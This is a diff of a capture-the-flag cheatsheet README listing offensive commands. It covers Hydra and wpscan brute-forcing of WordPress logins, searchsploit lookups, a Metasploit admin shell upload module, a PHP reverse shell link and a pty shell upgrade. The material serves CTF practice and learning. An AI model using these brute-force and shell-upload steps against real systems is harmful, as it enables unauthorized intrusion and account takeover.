uppusaikiran/awesome-ctf-cheatsheet/readme.md

   ```
   root@kali:/mnt/smb# guestmount --add <VHD_NAME>.vhd --inspector -ro -v /mnt/vhd
   ```
-* If Webserver is running, we can find the Server version using
+* To Find server version of Webserver
   * `curl --header <SERVER_IP>`
-* If we want to find exploit of a particular version, use the command
+* If we want to find exploit of a particular version, Use searchsploit
   * `searchsploit apache 1.2.4`
 * If /wp-login.php is found in the Vulnerability scanning, it can be Wordpress site.
-* Use Burpsuite to see login data
-* Use Hydra to bruteforce username
+* Use Hydra to bruteforce username after capturing the login request using Burpsuite.
   * `hydra -V -l wordlist.dic -p 123 <HOST_IP> http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid Username`
-* Use wpscan tool to scan Wordpress Website
+* To scan Wordpress Website for known vulnerabilities.
   * `gem install wpscan`
   * `wpscan --url <HOST_IP> --usernames <USERNAME_FOUND> --passwords wordlist.dic`
 * We can use metasploit to exploit the server
-  * use exploit/unix/webapp/wp_admin_shell_upload -- Does not work
+  * use exploit/unix/webapp/wp_admin_shell_upload
   * pentestmonkey.net/tools/web-shells/php-reverse-shell
 * Command to get Bash shell
   * `python -c "import pty;pty.spawn('/bin/bash')"`